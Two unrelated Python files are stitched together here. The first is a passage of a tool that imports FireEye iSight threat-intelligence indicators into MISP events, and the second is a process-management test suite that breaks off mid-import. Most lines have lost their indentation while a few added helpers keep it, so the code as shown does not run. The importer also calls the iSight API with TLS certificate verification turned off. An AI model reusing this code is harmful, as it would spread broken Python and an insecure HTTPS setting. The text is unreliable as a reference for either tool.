whois_object.add_attribute('registrant-email', value=isight_alert.registrantEmail, to_ids=network_ids)
if isight_alert.registrantName:
whois_object.add_attribute('registrant-name', value=isight_alert.registrantName, to_ids=False)
if isight_alert.domain:
whois_object.add_attribute('domain', value=isight_alert.domain, to_ids=network_ids)
elif isight_alert.sourceDomain:
whois_object.add_attribute('domain', value=isight_alert.sourceDomain, to_ids=network_ids)
event.add_object(whois_object)
# If the report contains a URL, create a url attribute.
if isight_alert.url:
event.add_attribute(category='Network activity', type='url', value=isight_alert.url, to_ids=network_ids,
comment=default_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
event.add_attribute_tag('veris:action:malware:variety="C2"', isight_alert.url)
# If the report contains registry information, create a regkey attribute.
# Ideally, the registry field would be split into hive, key and value.
if isight_alert.registry:
# If a file description is given, add it to the default comment.
if isight_alert.description:
add_comment = isight_alert.description
if default_comment == '':
reg_comment = add_comment
else:
reg_comment = default_comment + '; ' + add_comment
else:
reg_comment = default_comment
event.add_attribute(category='Artifacts dropped', type='regkey', value=isight_alert.registry, to_ids=file_ids,
comment=reg_comment)
# If the report contains a malware family, create a malware-type attribute.
if isight_alert.malwareFamily:
event.add_attribute(category='Antivirus detection', type='text', value=isight_alert.malwareFamily,
to_ids=False)
# If the report contains an actor, create a threat-actor attribute.
if isight_alert.actor:
# Don't use the threat actor for detection.
event.add_attribute(category='Attribution', type='threat-actor', value=isight_alert.actor, to_ids=False)
# Finally, commit the event additions to the MISP instance.
misp_instance.update_event(event)
# Lastly, publish the event without sending an alert email.
# This command expects the event ID instead of a MISPevent as argument.
misp_instance.publish(event['id'], alert=False)
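# Sketch of the to_ids decision applied throughout update_misp_event() above, written as a
# hypothetical helper for clarity: an indicator is only flagged for detection when iSight marks
# it as attacker-controlled or compromised infrastructure (file indicators additionally fall
# back to intelligenceType == 'malware').
def _example_to_ids(identifier):
    return identifier in ('Attacker', 'Compromised')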
# Create a new MISP event.
def create_misp_event(misp_instance, isight_report_instance):
# No MISP event for this iSight report ID exists yet.
# Therefore, create a new MISP event.
# Convert the publication date of the iSight report into a datetime object.
if isight_report_instance.publishDate:
date = datetime.datetime.fromtimestamp(isight_report_instance.publishDate)
else:
# If iSight doesn't provide a date, use today's date.
date = datetime.datetime.now(datetime.timezone.utc)
# Create a MISP event from the FireEye iSight report with the following parameters.
print('****create new event*****')
event = MISPEvent()
event.distribution = 1 # This community only
if isight_report_instance.riskRating == 'CRITICAL' or isight_report_instance.riskRating == 'Critical':
event.threat_level_id = 1 # High
elif isight_report_instance.riskRating == 'HIGH' or isight_report_instance.riskRating == 'High':
event.threat_level_id = 1 # High
elif isight_report_instance.riskRating == 'MEDIUM' or isight_report_instance.riskRating == 'Medium':
event.threat_level_id = 2 # Medium
elif isight_report_instance.riskRating == 'LOW' or isight_report_instance.riskRating == 'Low':
event.threat_level_id = 3 # Low
else:
event.threat_level_id = 4 # Unknown
event.analysis = 2 # Completed
event.info = "iSIGHT: " + isight_report_instance.title
event.date = date
# Push the event to the MISP server.
my_event = misp_instance.add_event(event, pythonify=True)
print("#######Push event to MISP server####",my_event)
PySight_settings.logger.debug('Created MISP event %s for iSight report %s', event, isight_report_instance.reportId)
# Add default tags to the event.
misp_instance.tag(my_event, 'basf:classification="internal"')
#misp_instance.tag(my_event, 'basf:source="iSight"')
misp_instance.tag(my_event, 'CTI feed: Fireeye:iSight')
misp_instance.tag(my_event, 'tlp:amber')
# Use some iSight ThreatScapes for event tagging. Reports can have multiple ThreatScapes.
if 'Cyber Espionage' in isight_report_instance.ThreatScape:
# VERIS distinguishes between external, internal or partner actors. This difference is not yet implemented in
# MISP. External would be most likely.
#misp_instance.tag(my_event, 'veris:actor:external:motive="Espionage"')
misp_instance.tag(my_event, 'veris:actor:motive="Espionage"')
if 'Hacktivism' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'veris:actor:external:variety="Activist"')
if 'Critical Infrastructure' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'basf:technology="OT"')
if 'Cyber Physical' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'basf:technology="OT"')
if 'Cyber Crime' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'veris:actor:external:variety="Organized crime"')
# Add the iSight report ID and web link as attributes.
if isight_report_instance.reportId:
misp_instance.add_attribute(my_event, {'category': 'External analysis', 'type': 'text', 'to_ids': False,
'value': isight_report_instance.reportId}, pythonify=True)
if isight_report_instance.webLink:
misp_instance.add_attribute(my_event, {'category': 'External analysis', 'type': 'link', 'to_ids': False,
'value': isight_report_instance.webLink}, pythonify=True)
# Put the ThreatScape into an Attribution attribute, but disable correlation.
if isight_report_instance.ThreatScape:
misp_instance.add_attribute(my_event, {'category': 'Attribution', 'type': 'text', 'to_ids': False,
'value': isight_report_instance.ThreatScape,
'disable_correlation': True}, pythonify=True)
# Add specific attributes from this iSight report.
update_misp_event(misp_instance, my_event, isight_report_instance)
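# The riskRating to threat_level_id mapping used above, condensed into a hypothetical helper
# (1 = High, 2 = Medium, 3 = Low, 4 = Unknown):
def _example_threat_level(risk_rating):
    return {'CRITICAL': 1, 'HIGH': 1, 'MEDIUM': 2, 'LOW': 3}.get(str(risk_rating).upper(), 4)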
# Retrieve the event ID of an event.
def check_misp_all_results(a_result):
"""
:param a_result:
:type a_result:
:return: previous event from MISP
:rtype:
"""
# PySight_settings.logger.debug('Checking %s if it contains previous events', a_result)
if 'message' in a_result:
if a_result['message'] == 'No matches.':
PySight_settings.logger.error('No existing MISP event found')
# has really no event
return False
elif 'Event' in a_result[0]:
previous_event = a_result[0]['Event']['id']
PySight_settings.logger.debug('Found an existing MISP event with ID %s', previous_event)
return previous_event
else:
for e in a_result['response']:
previous_event = e['Event']['id']
PySight_settings.logger.debug('Found an existing MISP event with ID %s', previous_event)
return previous_event
# Check whether there already exists a MISP event for a specific FireEye iSight report.
def misp_check_for_previous_event(misp_instance, isight_alert):
"""
Default: No event exists for this iSight report ID.
:param misp_instance:
:type misp_instance:
:param isight_alert:
:type isight_alert:
:return:
event id if an event is there
false if no event exists yet
:rtype:
"""
event = False
if misp_instance is None:
PySight_settings.logger.error('No MISP instance provided')
return False
# Search based on report ID.
if isight_alert.reportId:
result = misp_instance.search(value=isight_alert.reportId, type_attribute='text', category='External analysis')
# If something was found in the MISP instance, then retrieve the event
if result:
event = check_misp_all_results(result)
# If no event found, search based on report URL.
if isight_alert.webLink and not event:
result = misp_instance.search(value=isight_alert.webLink, type_attribute='link', category='External analysis')
# If something was found in the MISP instance, then retrieve the event
if result:
event = check_misp_all_results(result)
if not result:
PySight_settings.logger.debug('Found no existing event for iSight report ID %s', isight_alert.reportId)
return event
# Generate a PyMISP instance.
def get_misp_instance():
"""
:return: MISP instance
:rtype: ExpandedPyMISP
"""
print('*******get misp instance()********')
# Proxy settings are taken from the config file and converted to a dict.
if PySight_settings.USE_MISP_PROXY:
misp_proxies = {
'http': str(PySight_settings.proxy_address),
'https': str(PySight_settings.proxy_address)
}
else:
misp_proxies = {}
try:
# URL of the MISP instance, API key and SSL certificate validation are taken from the config file.
return ExpandedPyMISP(PySight_settings.misp_url, PySight_settings.misp_key, PySight_settings.misp_verifycert,
proxies=misp_proxies)
#return PyMISP(PySight_settings.misp_url, PySight_settings.misp_key, PySight_settings.misp_verifycert,
# proxies=misp_proxies)
except Exception:
PySight_settings.logger.error('Unexpected error in MISP init: %s', sys.exc_info())
return False
# Process one FireEye iSight report and convert it into a MISP event.
def process_isight_indicator(a_json):
"""
Create a pySightReport instance from the JSON and map it into a MISP event
:param a_json:
:type a_json:
"""
try:
# Get a MISP instance per thread
this_misp_instance = get_misp_instance()
print('********',this_misp_instance,'*******')
# Without a MISP instance this does not make sense
if this_misp_instance is False:
raise ValueError("No MISP instance found.")
# Acquire a semaphore (decrease the counter in the semaphore).
if PySight_settings.use_threading:
thread_limiter.acquire()
# PySight_settings.logger.debug("max number %s current number: ", thread_limiter._initial_value, )
# Parse the FireEye iSight report
isight_report_instance = pySightReport(a_json)
# If in DEBUG mode, write the iSight reports to a file.
if PySight_settings.debug_mode:
# Create the "reports" subdirectory for storing iSight reports, if it doesn't exist already.
if not os.path.exists("reports"):
os.makedirs("reports")
f = open("reports/" + isight_report_instance.reportId, 'a')
# Write the iSight report into the "reports" subdirectory.
f.write(json.dumps(a_json, sort_keys=True, indent=4, separators=(',', ': ')))
f.close()
# Check whether we already have an event for this reportID.
PySight_settings.logger.debug('Checking for existing event with report ID %s', isight_report_instance.reportId)
event_id = misp_check_for_previous_event(this_misp_instance, isight_report_instance)
if not event_id:
# Create a new MISP event
PySight_settings.logger.debug('No event found for report ID %s -- will create a new one',
isight_report_instance.reportId)
print('***create new MISP event****')
create_misp_event(this_misp_instance, isight_report_instance)
else:
# Add the data to the found event
event = this_misp_instance.get_event(event_id, pythonify=True)
update_misp_event(this_misp_instance, event, isight_report_instance)
# Reset the iSight report instance when done.
isight_report_instance = None
# Release the semaphore (increase the counter in the semaphore).
if PySight_settings.use_threading:
thread_limiter.release()
except AttributeError as e_AttributeError:
sys, traceback = error_handling(e_AttributeError, a_string="Attribute Error")
return False
except TypeError as e_TypeError:
sys, traceback = error_handling(e_TypeError, a_string="Type Error:")
return False
except Exception as e_Exception:
sys, traceback = error_handling(e_Exception, a_string="General Error:")
return False
# Process all FireEye iSight reports and convert them to MISP events.
def misp_process_isight_indicators(a_result):
"""
:param a_result:
:type a_result:
"""
# Create the thread-limiting semaphore once and make it visible at module level,
# because process_isight_indicator() acquires and releases it.
global thread_limiter
thread_limiter = threading.BoundedSemaphore(value=PySight_settings.number_threads)
# Process each indicator in the JSON message
for indicator in a_result['message']:
PySight_settings.logger.debug('Processing report %s', indicator['reportId'])
if PySight_settings.use_threading:
# Use threads to process the indicators
print('***threading****')
# The maximum number of concurrent threads is enforced by the module-level
# semaphore created above.
# Define a thread
t = threading.Thread(target=process_isight_indicator, args=(indicator,))
# Start the thread
t.start()
else:
# No threading
print('***no threading***')
process_isight_indicator(indicator)
# Make the FireEye iSight API request.
def isight_load_data(a_url, a_query, a_header):
"""
:param a_url:
:type a_url:
:param a_query:
:type a_query:
:param a_header:
:type a_header:
:return:
:rtype:
"""
# This is the URL for the iSight API query
url_to_load = a_url + a_query
print('******url to load:',url_to_load)
# Set the proxy if specified
if PySight_settings.USE_ISIGHT_PROXY:
isight_proxies = {
'http': PySight_settings.proxy_address,
'https': PySight_settings.proxy_address
}
PySight_settings.logger.debug('Connecting to FireEye iSight via proxy %s', PySight_settings.proxy_address)
else:
isight_proxies = {}
PySight_settings.logger.debug('Connecting directly to FireEye iSight without a proxy')
PySight_settings.logger.debug('FireEye iSight request URL: %s', url_to_load)
PySight_settings.logger.debug('FireEye iSight request header: %s', a_header)
try:
r = requests.get(url_to_load, headers=a_header, proxies=isight_proxies, verify=False)
except requests.exceptions.ChunkedEncodingError as e:
PySight_settings.logger.error('Error when connecting to the FireEye iSight API: %s', e)
return False
except requests.exceptions.RequestException as e:
# requests raises its own exception hierarchy (not urllib's HTTPError); return False here
# so that 'r' is never referenced without being defined.
PySight_settings.logger.error('HTTP request to the FireEye iSight API failed: %s', e)
return False
if r.status_code == 204:
PySight_settings.logger.warning('No result found for search')
return False
elif r.status_code == 404:
PySight_settings.logger.error('%s: check the FireEye iSight API URL', r.reason)
PySight_settings.logger.debug('%s', r.text)
return False
elif r.status_code != 200:
PySight_settings.logger.error('Request not successful: %s', r.text)
return False
return_data_cleaned = r.text.replace('\n', '')
json_return_data_cleaned = json.loads(return_data_cleaned)
PySight_settings.logger.debug('Number of indicators returned: %s', len(json_return_data_cleaned['message']))
if not json_return_data_cleaned['success']:
PySight_settings.logger.error('Error with the FireEye iSight API connection %s',
json_return_data_cleaned['message']['description'])
PySight_settings.logger.debug(json_return_data_cleaned)
return False
else:
# For debugging purposes, write the returned IOCs to a file
if PySight_settings.debug_mode:
timestring = datetime.datetime.now(datetime.timezone.utc).strftime('%Y%m%d-%H%M%S')
if not os.path.exists('debug'):
os.makedirs('debug')
f = open('debug/' + timestring, 'w')
f.write(json.dumps(json_return_data_cleaned, sort_keys=True, indent=6, separators=(',', ': ')))
f.close()
return json_return_data_cleaned
# Define the header for the HTTP requests to the iSight API.
def set_header(a_prv_key, a_pub_key, a_query):
"""
:param a_prv_key:
:type a_prv_key:
:param a_pub_key:
:type a_pub_key:
:param a_query:
:type a_query:
:return: Header for iSight search
:rtype:
"""
# Prepare the data to calculate the X-Auth-Hash.
print('***set header***')
accept_version = '2.5'
output_format = 'application/json'
time_stamp = email.utils.formatdate(localtime=True)
string_to_hash = a_query + accept_version + output_format + time_stamp
# Convert the authentication information from UTF-8 encoding to a bytes object
message = bytes(string_to_hash, 'utf-8')
secret = bytes(a_prv_key, 'utf-8')
# Hash the authentication information
hashed = hmac.new(secret, message, hashlib.sha256)
header = {
'X-Auth': a_pub_key,
'X-Auth-Hash': hashed.hexdigest(),
'Accept': output_format,
'Accept-Version': accept_version,
'Date': time_stamp
}
return header
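# Usage sketch with placeholder keys (the real values come from PySight_settings): the same
# query string must be passed to both set_header() and the subsequent GET request, because it
# is part of the hashed X-Auth-Hash input.
def _example_build_header():
    return set_header('example-private-key', 'example-public-key', '/view/indicators?since=0')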
# Prepare the request to the FireEye iSight API.
def isight_prepare_data_request(a_url, a_query, a_pub_key, a_prv_key):
"""
:param a_url:
:type a_url:
:param a_query:
:type a_query:
:param a_pub_key:
:type a_pub_key:
:param a_prv_key:
:type a_prv_key:
:return:
:rtype:
"""
header = set_header(a_prv_key, a_pub_key, a_query)
result = isight_load_data(a_url, a_query, header)
print('######header:',header)
print('#####result:',result)
if not result:
PySight_settings.logger.error('Something went wrong when retrieving indicators from the FireEye iSight API')
return False
else:
return result
# Search for FireEye iSight reports published since the specified last hours.
def isight_search_indicators(base_url, public_key, private_key, hours):
# Convert hours to seconds and subtract them from the current time
since = int(time.time()) - hours * 60 * 60
# Limit the returned data to that published since this Epoch datetime and the present time.
# Therefore, add the 'since' parameter as a query string.
params = {
'since': since
}
search_query = '/view/indicators?' + urllib.parse.urlencode(params)
# Retrieve indicators and warning data since the specified date and time.
return isight_prepare_data_request(base_url, search_query, public_key, private_key)
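# Usage sketch (illustrative only, not called anywhere): fetch everything iSight published
# during the last 24 hours, using the credentials from the config file.
def _example_last_day():
    return isight_search_indicators(PySight_settings.isight_url, PySight_settings.isight_pub_key,
                                    PySight_settings.isight_priv_key, 24)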
# This function is called from test_pysight.py but otherwise not used.
def data_search_report(url, public_key, private_key, a_reportid):
print("text_search_wildcard Response:")
# wild card text search
# FIXME: not used
# params = {
# 'reportID': a_reportid
# }
text_search_query = '/report/' + a_reportid
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_title(url, public_key, private_key):
print("text_search_title Response:")
# title phrase search
params = {
'text': 'title:"Software Stack 3.1.2"'
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_wildcard(url, public_key, private_key):
print("text_search_wildcard Response:")
# wild card text search
params = {
'text': 'zero-day*',
'limit': '10',
'offset': '0'
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_sensitive_reports(url, public_key, private_key):
print("text_search_sensitive_reports Response:")
params = {
'text': 'title:"Latin American"',
'customerIntelOnly': True
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_advanced_search_filter_indicators(url, public_key, private_key):
print("advanced_search_filter_indicators Response:")
# Indicator field md5
advanced_search_query = '/search/advanced?query=md5=~8512835a95d0fabfb&fileIdentifier=[Victim;Attacker]'
isight_prepare_data_request(url, advanced_search_query, public_key, private_key)
# This function is not used.
def data_basic_search_ip(url, public_key, private_key, ip):
PySight_settings.logger.debug("basic_search Response")
# Query for search
basic_search_query = '/search/basic?ip=' + ip
isight_prepare_data_request(url, basic_search_query, public_key, private_key)
# This function is not used.
def data_ioc(url, public_key, private_key):
# print ("iocs Response:")
# 30 days back start date
start_date = int(time.time()) - 2592000
end_date = int(time.time())
ioc_query = '/view/iocs?' + 'start_date=' + str(start_date) + '&end_date=' + str(end_date)
return isight_prepare_data_request(url, ioc_query, public_key, private_key)
# This function is not used.
def data_text_search_simple(url, public_key, private_key):
print("text_search_simple Response:")
# simple text search
params = {
'text': 'Stack-Based Buffer Overflow Vulnerability',
'limit': '10',
'offset': '0'
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_filter(url, public_key, private_key):
try:
print("text_search_filter Response:")
# filter text search
params = {
'text': 'malware',
'filter': 'threatScape:cyberEspionage,cyberCrime&riskRating:HIGH,LOW&language:english',
'sortBy': 'title:asc,reportId:desc',
'limit': '10',
'offset': '5'
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
print('text_search_query', text_search_query)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
params = {
'text': 'malware',
'filter': 'cveId:~\'CVE\''
}
text_search_query = '/search/text?' + urllib.parse.urlencode(params)
return isight_prepare_data_request(url, text_search_query, public_key, private_key)
except Exception:
return False
if __name__ == '__main__':
# Log the script start time.
PySight_settings.logger.info('PySight2MISP started at %s', datetime.datetime.now(datetime.timezone.utc))
if PySight_settings.debug_mode:
# This is to log the time used to run the script
from timeit import default_timer as timer
start = timer()
# Retrieve FireEye iSight indicators of the last x hours
result = isight_search_indicators(PySight_settings.isight_url, PySight_settings.isight_pub_key, PySight_settings.isight_priv_key, PySight_settings.isight_last_hours)
# PySight_settings.logger.info('url: %s, pubkey: %s, priv_key: %s, hrs: %s', PySight_settings.isight_url, PySight_settings.isight_pub_key, PySight_settings.isight_priv_key, PySight_settings.isight_last_hours)
PySight_settings.logger.debug('Search result: %s', result)
if result is False:
PySight_settings.logger.debug('No indicators available from FireEye iSight')
else:
misp_process_isight_indicators(result)
PySight_settings.logger.debug('PySight2MISP finished at %s', datetime.datetime.now(datetime.timezone.utc))
# If loglevel equals DEBUG, log the time the script ran.
if PySight_settings.debug_mode:
end = timer()
PySight_settings.logger.debug('Time taken %s', end - start)
print('######Script Done #######')
# data_ioc(url, public_key, private_key)
# data_text_search_simple(isight_url, public_key, private_key)
# data_text_search_filter(isight_url, public_key, private_key)
# data_text_search_title(url, public_key, private_key)
# data_text_search_wildcard(url, public_key, private_key)
# data_text_search_sensitive_reports(isight_url, public_key, private_key)
# data_advanced_search_filter_indicators(url, public_key, private_key)
|
test_processfamily.py
|
__author__ = 'matth'
import unittest
import sys
from processfamily.test import ParentProcess, Config
import os
import subprocess
import requests
import time
import socket
import logging
import glob
from processfamily.processes import process_exists, kill_process, AccessDeniedError
from processfamily import _traceback_str
import signal
import threading
if sys.platform.startswith('win'):
from processfamily._winprocess_ctypes import CAN_USE_EXTENDED_STARTUPINFO, CREATE_BREAKAWAY_FROM_JOB
class _BaseProcessFamilyFunkyWebServerTestSuite(unittest.TestCase):
skip_crash_test = None
def setUp(self):
self.pid_dir = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'pid')
if not os.path.exists(self.pid_dir):
os.makedirs(self.pid_dir)
for pid_file in self.get_pid_files():
with open(pid_file, "r") as f:
pid = f.read().strip()
if pid and self.process_exists_or_access_denied(int(pid)):
logging.warning(
("Process with pid %s is stilling running. This could be a problem " + \
"(but it might be a new process with a recycled pid so I'm not killing it).") % pid )
else:
os.remove(pid_file)
self.check_server_ports_unbound()
def process_exists_or_access_denied(self, pid):
try:
return process_exists(pid)
except AccessDeniedError as e:
#It is most likely that this process does exist!
return True
def kill_process_ignore_access_denied(self, pid):
try:
return kill_process(pid)
except AccessDeniedError as e:
#Can't do anything about this
pass
def try_and_stop_everything_for_tear_down(self):
#Override this if you can do something about stopping everything
pass
def tearDown(self):
command_file = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'command.txt')
if os.path.exists(command_file):
os.remove(command_file)
self.wait_for_parent_to_stop(5)
#Now check that no processes are left over:
start_time = time.time()
processes_left_running = []
for pid_file in self.get_pid_files():
with open(pid_file, "r") as f:
pid = f.read().strip()
if pid:
while self.process_exists_or_access_denied(int(pid)) and time.time() - start_time < 5:
time.sleep(0.3)
if self.process_exists_or_access_denied(int(pid)):
processes_left_running.append(int(pid))
os.remove(pid_file)
if processes_left_running:
for pid in processes_left_running:
try:
self.kill_process_ignore_access_denied(pid)
except Exception as e:
logging.warning("Error killing process with pid %d: %s", pid, _traceback_str())
self.try_and_stop_everything_for_tear_down()
start_time = time.time()
for pid in processes_left_running:
while self.process_exists_or_access_denied(int(pid)) and time.time() - start_time < 40:
time.sleep(0.3)
self.check_server_ports_unbound()
self.assertFalse(processes_left_running, msg="There should have been no PIDs left running but there were: %s" % (', '.join([str(p) for p in processes_left_running])))
def start_up(self, test_command=None, wait_for_middle_child=True, wait_for_children=True):
command_file = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'command.txt')
if test_command:
with open(command_file, "w") as f:
f.write(test_command)
elif os.path.exists(command_file):
os.remove(command_file)
self.start_parent_process()
#Wait up to 15 secs for all the ports to be available (the parent might wait 10 for a middle child):
start_time = time.time()
still_waiting = True
while still_waiting and time.time() - start_time < 15:
still_waiting = False
for i in range(4):
if i > 0 and not wait_for_children:
continue
if i == 2 and not wait_for_middle_child:
continue
try:
s = socket.socket()
try:
s.connect(("localhost", Config.get_starting_port_nr()+i))
except socket.error as e:
still_waiting = True
break
finally:
s.close()
if still_waiting:
time.sleep(0.3)
self.assertFalse(still_waiting, "Waited 15 seconds and some http ports are still not accessible")
def assert_middle_child_port_unbound(self):
port = Config.get_starting_port_nr()+2
logging.info("Checking for ability to bind to port %d", port)
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if not sys.platform.startswith('win'):
#On linux I need this setting because we are starting and stopping things
#so frequently that they are still in a TIME_WAIT state when I get here
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", port))
except Exception as e:
self.fail("Middle child port is not unbound as expected")
finally:
serversocket.close()
def get_pid_files(self):
return glob.glob(os.path.join(self.pid_dir, "*.pid"))
def kill_parent(self):
for pid_file in self.get_pid_files():
if os.path.basename(pid_file).startswith('c'):
continue
with open(pid_file, "r") as f:
pid = f.read().strip()
kill_process(int(pid))
def test_parent_stop(self):
self.start_up()
self.send_parent_http_command("stop")
def test_parent_exit(self):
self.start_up()
self.send_parent_http_command("exit")
def test_parent_crash(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up()
self.send_parent_http_command("crash")
def test_parent_interrupt_main(self):
self.start_up()
self.send_parent_http_command("interrupt_main")
def test_parent_kill(self):
self.start_up()
self.kill_parent()
def test_parent_stop_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("stop")
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_parent_exit_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("exit")
def test_parent_crash_child_locked_up(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("crash")
def test_parent_interrupt_main_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("interrupt_main")
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_parent_kill_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.kill_parent()
def test_child_exit_on_start(self):
self.start_up(test_command='child_exit_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_error_during_run(self):
self.start_up(test_command='child_error_during_run', wait_for_middle_child=False)
self.send_parent_http_command("stop")
def test_child_freeze_on_start(self):
self.start_up(test_command='child_freeze_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
self.wait_for_parent_to_stop(11)
def test_child_error_on_start(self):
self.start_up(test_command='child_error_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_error_during_init(self):
self.start_up(test_command='child_error_during_init', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_freeze_during_init(self):
self.start_up(test_command='child_freeze_during_init', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
self.wait_for_parent_to_stop(11)
def test_child_crash_on_start(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up(test_command='child_crash_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
if not sys.platform.startswith('win'):
def test_sigint(self):
self.start_up()
os.kill(self.parent_process.pid, signal.SIGINT)
def test_sigint_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
os.kill(self.parent_process.pid, signal.SIGINT)
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_file_open_by_parent_before_fork_can_be_closed_and_deleted(self):
self.start_up()
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("OK", result, "Command to close file and delete it failed (got response: %s)" % result)
self.send_parent_http_command("stop")
def test_echo_std_err_on(self):
self.start_up(test_command='echo_std_err')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off_close_fds_off(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off_close_fds_off')
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("FAIL", result, "Command to close file and delete it did not fail (got response: %s)" % result)
self.send_parent_http_command("stop")
def test_close_fds_off(self):
self.start_up(test_command='close_fds_off')
result = self.send_parent_http_command("close_file_and_delete_it")
if sys.platform.startswith('win'):
#On linux this works fine
self.assertEqual("FAIL", result, "Command to close file and delete it did not fail (got response: %s)" % result)
else:
#TODO: a relevant test on linux?
pass
self.send_parent_http_command("stop")
def test_child_comms_strategy_stdin_close(self):
self.start_up(test_command='use_cat', wait_for_children=False)
self.send_parent_http_command("stop")
def test_child_comms_strategy_none(self):
self.start_up(test_command='use_cat_comms_none', wait_for_children=False)
self.send_parent_http_command("stop")
def test_use_job_object_off(self):
self.start_up(test_command='use_job_object_off')
self.send_parent_http_command("stop")
def test_cpu_affinity_off(self):
self.start_up(test_command='cpu_affinity_off')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off_file_open_by_parent(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off')
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("OK", result, "Command to close file and delete it failed (got response: %s)" % result)
self.send_parent_http_command("stop")
def freeze_up_middle_child(self):
#First check that we can do this fast (i.e. things aren't stuttering because of environment):
for i in range(5):
self.send_middle_child_http_command("", timeout=4)
self.send_middle_child_http_command("hold_gil_%d" % (60*10)) #Freeze up for 10 minutes
while True:
#Try and do this request until it takes longer than 4 secs - this would mean that we have successfully got stuck
try:
self.send_middle_child_http_command("", timeout=4)
except requests.exceptions.Timeout as t:
break
def check_server_ports_unbound(self):
bound_ports = []
for pnumber in range(4):
port = Config.get_starting_port_nr() + pnumber
#I just try and bind to the server port and see if I have a problem:
logging.info("Checking for ability to bind to port %d", port)
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if not sys.platform.startswith('win'):
#On linux I need this setting because we are starting and stopping things
#so frequently that they are still in a TIME_WAIT state when I get here
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", port))
except Exception as e:
bound_ports.append(port)
finally:
serversocket.close()
self.assertFalse(bound_ports, "The following ports are still bound: %s" % ', '.join([str(p) for p in bound_ports]))
def get_path_to_ParentProcessPy(self):
return os.path.join(os.path.dirname(__file__), 'test', 'ParentProcess.py')
def send_parent_http_command(self, command, **kwargs):
return self.send_http_command(Config.get_starting_port_nr(), command, **kwargs)
def send_middle_child_http_command(self, command, **kwargs):
return self.send_http_command(Config.get_starting_port_nr()+2, command, **kwargs)
def send_http_command(self, port, command, **kwargs):
r = requests.get('http://localhost:%d/%s' % (port, command), **kwargs)
j = r.json
if callable(j):
return j()
else:
#This is the old requests api:
return j
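#For illustration: send_parent_http_command("stop") issues a GET request to
#http://localhost:<starting_port>/stop and returns the parsed JSON body; the
#callable check above keeps this working with both old and new requests APIs.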
def wait_for_process_to_stop(self, process, timeout):
if process is None:
logging.info("No process to wait for")
return
logging.info("Waiting for process (%d) to finish", process.pid)
start_time = time.time()
while time.time()-start_time < timeout:
    if process.poll() is not None:
        return
    time.sleep(0.3)
class NormalSubprocessTests(_BaseProcessFamilyFunkyWebServerTestSuite):
skip_crash_test = "The crash test throws up a dialog in this context" if sys.platform.startswith('win') else None
def start_parent_process(self):
kwargs={}
if sys.platform.startswith('win'):
kwargs['creationflags'] = CREATE_BREAKAWAY_FROM_JOB
self.parent_process = subprocess.Popen(
[sys.executable, self.get_path_to_ParentProcessPy()],
close_fds=True, **kwargs)
threading.Thread(target=self.parent_process.communicate).start()
def wait_for_parent_to_stop(self, timeout):
self.wait_for_process_to_stop(getattr(self, 'parent_process', None), timeout)
if sys.platform.startswith('win'):
import win32service
import win32serviceutil
